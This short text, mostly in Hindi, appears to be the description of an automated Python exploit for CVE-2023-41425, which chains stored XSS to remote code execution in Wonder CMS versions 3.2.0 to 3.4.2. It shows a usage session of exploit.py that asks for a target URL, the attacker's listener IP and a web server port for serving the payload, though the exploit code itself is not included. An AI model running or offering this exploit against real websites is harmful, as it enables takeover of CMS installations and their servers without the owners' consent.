
CVE-2023-41425 के लिए स्वचालित Python एक्सप्लॉइट, Wonder CMS 3.2.0 से 3.4.2 में संग्रहीत XSS को रिमोट कोड निष्पादन से जोड़ता है। प्रमाणित व्यवस्थापक क्रियाओं को सक्षम करके एक दुर्भावनापूर्ण पेलोड अपलोड और निष्पादित करने की अनुमति देता है।
CVE-2023-41425 (XSS से RCE, Wonder CMS 3.2.0 <= 3.4.2)
➜ CVE-2023-41425 python3 exploit.py
Enter target URL (RHOST, e.g., http://example.com/loginURL): http://redacted.com/loginURL
Enter your local host IP (LHOST, e.g., 10.10.14.xxx): xx.xx.xx.xx
Enter your local web server port (LPORTWEB, e.g., 80): 80

